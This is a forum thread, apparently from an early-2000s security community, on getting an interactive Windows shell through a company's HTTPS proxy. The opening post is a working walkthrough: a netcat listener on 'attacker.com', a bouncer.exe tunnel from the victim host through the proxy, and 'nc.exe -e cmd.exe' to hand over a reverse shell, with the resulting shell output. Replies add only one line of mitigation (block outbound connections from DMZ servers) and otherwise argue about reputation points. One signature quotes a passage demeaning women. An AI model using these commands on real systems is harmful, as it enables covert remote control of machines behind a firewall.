Gaining an interactive shell through SSL tunneling
Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Gaining an interactive shell through SSL tunneling

  1. #1
    Junior Member
    Join Date
    Oct 2003
    Posts
    2

    Gaining an interactive shell through SSL tunneling

    I apologize if you already know this, but to those who don't:

    You can get an interactive cmd.exe shell from a firewalled host if that host has access to a HTTP Proxy server that supports HTTPS.

    The tools required are the win32 ports of NetCat and Bouncer from http://nlxoo.8bit.co.uk/

    In this example, attacker.com is the attacker's host, victim.company.com is the victim's host and proxy.company.com is the victim's HTTP Proxy server

    Step 1:
    On attacker.com, the attacker executes:
    Code:
    nc.exe -l -p 443
    Step 2:
    On victim.company.com, the attacker executes:
    Code:
    bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080
    Step 3:
    On victim.company.com, the attacker executes:
    Code:
    nc.exe -e cmd.exe 127.0.0.1 9999
    Result:
    Inside the window from Step 1, the attacker gets the shell:
    Code:
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\nlxoo\Desktop\test>
    Note:
    1) If any of the programs or connections are terminated, the shell will be lost
    2) The proxy server must support HTTPS

  2. #2
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167
    Thanks for the info.

  3. #3
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Ok. So how would you prevent this from happening?
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  4. #4
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Easy, don't allow your DMZ servers to make outbound connections...case closed. It is just a twist on shoveling a reverse shell (the only difference is the encryption, which I would suppose you could probably do with cryptcat...hmm...maybe I have something play with now).

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  5. #5
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Duh! I wanted him to answer it... geez..
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  6. #6
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Oops :/

    EDIT: Dunno who negged him, but I can't tap him back up without massively awarding him...
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  7. #7
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    good lord/lordes! what a nightmare this could be... a disgruntled employee sets this to run friday night when no ones there.

    what jerk negged him. would you rather not know about it?
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  8. #8
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167
    You have to understand, people get neg'ed all the time for next to no reason. Anything that blurs the line between white/black turns into a instant neg.


    *few points i have, lost*

  9. #9
    Member
    Join Date
    Oct 2003
    Posts
    78
    So this dude gets hit with the green while poor newbie who actually points out the error sits there with some reds... someone fix this.. too bad I can't..
    [pong][shadow]Why won\'t anyone give me greenies???[/shadow] [/pong]

  10. #10
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    i guess it all depends on what you want to see here. IMO all none security posts in security threads should be negged. this is in the right forum. and is definitely security releated.

    even if he dosnt have an anser to msmittens question someone else will...and another hole gets closed!
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •